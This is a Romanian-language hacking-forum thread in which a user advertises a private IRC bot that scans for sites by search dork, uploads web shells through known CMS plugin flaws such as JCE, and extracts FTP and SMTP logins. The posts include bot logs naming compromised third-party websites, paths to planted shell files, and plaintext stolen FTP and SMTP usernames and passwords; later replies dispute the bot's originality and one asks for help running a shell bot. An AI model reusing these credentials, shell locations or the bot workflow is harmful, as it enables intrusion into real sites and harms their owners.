Jump to content
cPanel

Sursa De Bot run on mIRC

Recommended Posts

Posted (edited)

Jce Shell uploader: !jce [dork]

Civi Vuln: !civi [dork]

Acy Vuln Uploaded: !acy [dork]

JnewsLetter Vuln: !jnewsletter [dork]

Jinc Vuln: !jinc [dork]

Maianmedia Vuln: !mai [dork]

Jnews Vuln: !jnews [dork]

Redmystic Vuln: !red [dork]

PhpVMS Vuln: !vms [dork]

ClipBucket Vuln: !cbk [dork]

Slimstat Vuln: !slim [dork]

invit0r Vuln: !inv [dork]

Seo Watcher Vuln: !seo [dork]

OpenEmr Vuln: !emr [dork]

----

scanezi si iti da shelul, pe bugul acela.

Un Mic Test :

-=(16:00:29)=- <@cPanel> !jce /images/stories/ +partners

-=(16:00:29)=- <@Jt> Private JCE source!

-=(16:00:29)=- <@JT> (Jce) Dork: /images/stories/ +partners

-=(16:00:29)=- <@JT> (Jce) Search Engine Loading ...

Si logurile ti le da pe chan/prv

Example :

-=(16:08:29)=- <JT> (Jce) Kenya .::Predator::. MoDe:ON

-=(16:08:29)=- <JT> (Jce) Kenya .::Predator::. MoDe:ON

-=(16:10:48)=- <JT> (Jce) <> MaMa <>(@SheLL) IAM - DNSNET (SafeMode=OFF) (OS=Linux hosting2.reymann.com 2.6.32-54-server #116-Ubuntu SMP Tue Nov 12 19:37:57 UTC 2013 x86_64) (uid=33(www-data)

-=(16:10:48)=- <JT> (Jce) <> FTP <> ftp://www.paris-store.com/ [ 127.0.0.1 21 paris-store_ftp.paris-store hoopla08 ]

-=(16:10:50)=- <JT> (Jce) <> SMTP <> ftp://www.paris-store.com/ [ smtp.reymann.com 25 smtp rey ]

-----

Botul are functia de ati scoate smtp/ftp din shelul prins !

Cine o vrea si un o explicatie cum ruleaza PM

<JT> (Jce) <> GooGLe <>(@SheLL) http://www.bieneskatzenwelt.de//images/stories/plnt2.php (SafeMode=OFF) (OS=Linux h1867540.stratoserver.net 2.6.32-042stab078.27 #1 SMP Mon Jul 1 20:48:07 MSK 2013 i686) (uid=33(www-data)

<JT> (Jce) <> FTP <> ftp://www.bieneskatzenwelt.de/ [ 127.0.0.1 21 admin 2002Minotaurus1979 ]

<JT> (Jce) <> SMTP <> ftp://www.bieneskatzenwelt.de/ [ smtp.udag.de 25 bieneskatzenweltde-0001 4b!ene5 ]

Edited by cPanel
Posted

Asta NU este:

- Exploit

- POC

- Bot-ul tau nu ruleaza pe mirc, si pe IRC

Tot ce vedem aici e o simpla balarie. Pune sursa, asa se lucreaza aici.

E un simplu shellbot scris in perl.

Posted

@tex : ok , multumesc pentru corectarea pe care ai facut-o .

Cum am mai zis PM , nu o fac publica.

Poate o face publica altu , dar nu cam merita facuta publica, este prea "frumoasa" sa fie publica facuta.

Posted (edited)

Este inca UP - Topicul...

YaHoo www.uhal.sk - BOFF 1.0 FreeBSD dw8.nameserver.sk 9.1-STABLE FreeBSD 9.1-STABLE #0: Thu Feb 14 07:52:40 CET 2013 root@gw.nameserver.sk:/usr/obj/usr/src/sys/kernconf amd64

-=(16:51:55)=- <JxBot> (Jce) SeZNam http://www.katcinasmecka.cz//images/stories/iam.php

-=(17:47:29)=- <JxBot> (Jce) BigLobe http://www.pwsb.poznan.pl//images/stories/0day.php

-=(17:50:39)=- <JxBot> (Jce) UoL http://www.pwsb.poznan.pl//images/stories/0day.php

-=(17:52:17)=- <JxBot> (Jce) YaHoo http://www.agridept.gov.lk//images/stories/0day.php

-=(17:55:59)=- <JxBot> (Jce) YaHoo http://www.gaictech.com//images/stories/0d4y.php MoDe:ON

OFF : un bug sa scanez care da .. ii voi posta shelurile in Pm lui !

Edited by cPanel
Posted (edited)

Pai este publica sursa. Nu este facuta de tine. Daca o vinzi sau o dai contra unui schimb, posteaza te rog la RST Market, nu aici.

Categoria asta este facuta pentru altceva: https://rstforums.com/forum/exploituri-si-pocs.rst

source: http://pastebin.com/raw.php?i=1SvVhNfU

Mi-am adus aminte de o chestie apropo de asta cu "scanner privat". Pe vremuri era un hunedorean ratat ce ne cerea exploit-uri sau scannere si scria el in scripturi "Powered by Zerg", apoi le publica pe net.

Edited by aelius
Posted

@Tex : Arhive de genul acela... gasesti peste google ( free ) si sti si tu tot ce este free cam nu este bun ..

off : cum mut atuncea postarea "unde trebuie"

ON : Rog un admin sa mute atuncea postul facut de mine unde trebuie ...

Posted

Salut tuturor am si eu o intrebare cine are bunavointa sa ma ajute si pe mine sa urc un boot de shell pe canalul de mirc ???am root dar nu stiu cum sa il urc?Am platit pe cineva sa imi arate si mi-a dat teapa.Va rog macar niste indicatii linkuri etc.Va multumesc din suflet

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...